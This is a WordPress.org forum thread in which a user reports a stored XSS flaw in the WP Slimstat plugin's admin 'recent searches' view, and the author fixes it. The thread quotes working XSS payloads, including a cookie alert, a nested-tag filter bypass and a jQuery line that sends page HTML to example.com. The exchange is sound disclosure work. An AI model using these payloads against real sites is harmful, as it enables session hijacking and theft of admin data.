WordPress.org

Forums

WP Slimstat
[resolved] XSS Vurnability ?!?!? (23 posts)

  1. xssAlert
    Member
    Posted 2 years ago #

    Hello, im found a some prob with two plugins and wordpress,

    what im try :
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'>

    im put this in commentfield, plugin names "bug libary v.1.2.6)
    and a status of plugin "wp-slimstat v2.8.3"
    iem very sure, that the last plugin run this script. then when im load in admin backend the plugin and show from where the visitors incoming, the plugin run this script and produce the alert window! only this but
    a rly bad man, can do more

    so pls help to find it out
    thx

    http://wordpress.org/extend/plugins/wp-slimstat/

  2. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Could you please contact me at

    http://www.duechiacchiere.it/contatto

    to discuss this issue? I was not able to reproduce the issue just by using my plugin. Where did you type the javascript string?

    Thank you,
    Camu

  3. xssAlert
    Member
    Posted 2 years ago #

    read top :)

    srry for englisch but i can send u screenshot

    i am alrdy contact u over ur site.
    rob

  4. xssAlert
    Member
    Posted 2 years ago #

    ach put this code in to search,
    so ur wp-slimstat plugin just load it and execute . where on recent searches :)

    iam using last plugins

  5. camu
    Member
    Plugin Author

    Posted 2 years ago #

    I just tried to search for

    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'>

    in my local dev environment, but I couldn't replicate the issue. The string is correctly encoded and so the javascript is not executed. Please elaborate :)

  6. camu
    Member
    Plugin Author

    Posted 2 years ago #

    I just sent you a private message to investigate the issue.

    Thank you for reporting it and for helping make WP SlimStat a better product.

    Camu

  7. xssAlert
    Member
    Posted 2 years ago #

    <script>alert(document.cookie);</script>

    test it on search
    in your wp search
    then log in and load wp-slimstat overview, there u can see last searches

    so enjoy

  8. camu
    Member
    Plugin Author

    Posted 2 years ago #

    I will release a fix as soon as possible, thank you. Please note though that no sensitive information can be transmitted to a different server, because of JavaScript's security policies.

    Best
    Camu

  9. xssAlert
    Member
    Posted 2 years ago #

    yup, but u can load a "bad code" and load viruses etc

  10. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Okay, this should be fixed now. I will release a new version on Monday. In the meanwhile, would you be interested in testing this new version?

    cheers
    camu

  11. Ov3rfly
    Member
    Posted 2 years ago #

    Please note though that no sensitive information can be transmitted to a different server, because of JavaScript's security policies.

    That's not correct. Data can be sent to any external server if you use a search-term like this:

    <script>jQuery('<img/>').attr('src','http://example.com/?data='+jQuery('body').html())</script>

    This would send the whole body HTML to example.com server. There are endless possibilities. This should be fixed ASAP.

  12. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Thanks, Ov3rfly, you make a very good point indeed. This has already been fixed in version 2.8.5, which will be released asap. Are you interested in testing it to make sure the vulnerability has been addressed?

  13. xssAlert
    Member
    Posted 2 years ago #

    sure..

    just send me it over mail :) but no virus XD :))

    wordpress should be to fixed, to enable Java script in search box, but no one interesing it , next change to another CMS

  14. camu
    Member
    Plugin Author

    Posted 2 years ago #

    I'll send it to you as soon as possible, thank you for your help!

    Camu

  15. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Sent it.

  16. xssAlert
    Member
    Posted 2 years ago #

    u sent me alrdy 2x that script
    and it seems not fixed. maybe u ask in some forums about disable rendering or what ever

    i cant help u
    your script now deletet

  17. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Thank you for your patience, xssAlert. I tested each new version of WP SlimStat before sending it to you. I used

    <script>alert(document.cookies);</script>

    as search string, and it is not being executed anymore, in the most recent version I sent you. Could you please be a little more specific about WHERE you have entered that script? Or WHERE is being executed?

    If you are a security expert, and you really want to help an open source developer to improve his code, could you please try to leverage this vulnerability on MY blog at

    http://www.duechiacchiere.it

    so that I can see it in action? Thank you for your patience, my friend.

    Really appreciated,
    Camu

  18. xssAlert
    Member
    Posted 2 years ago #

    hey ya

    so
    im set db to 0

    deletet

    put on WP Search
    <<SCRIPT>alert("XSS");//<</SCRIPT>

    and your script load stuff again :/

    ill look in to ur script

  19. xssAlert
    Member
    Posted 2 years ago #

  20. xssAlert
    Member
    Posted 2 years ago #

    ok iam reviding

    plug in work now

    with first test , xss dosent work

    GJ

  21. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Not sure why it didn't work the first time, but I'm glad you were able to run your test again and verify that the vulnerability is indeed gone :) Ah, these Germans, always a little too skeptic and stubborn... Just kidding! Thank you for reporting the issue and helping me fix it!

    Cheers,
    Camu

    PS: a vote for my plugin would be a nice way to say thank you!

  22. xssAlert
    Member
    Posted 2 years ago #

    yo yo these germans :)

  23. camu
    Member
    Plugin Author

    Posted 2 years ago #

    Haha, I was just kidding of course!

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags

No tags yet.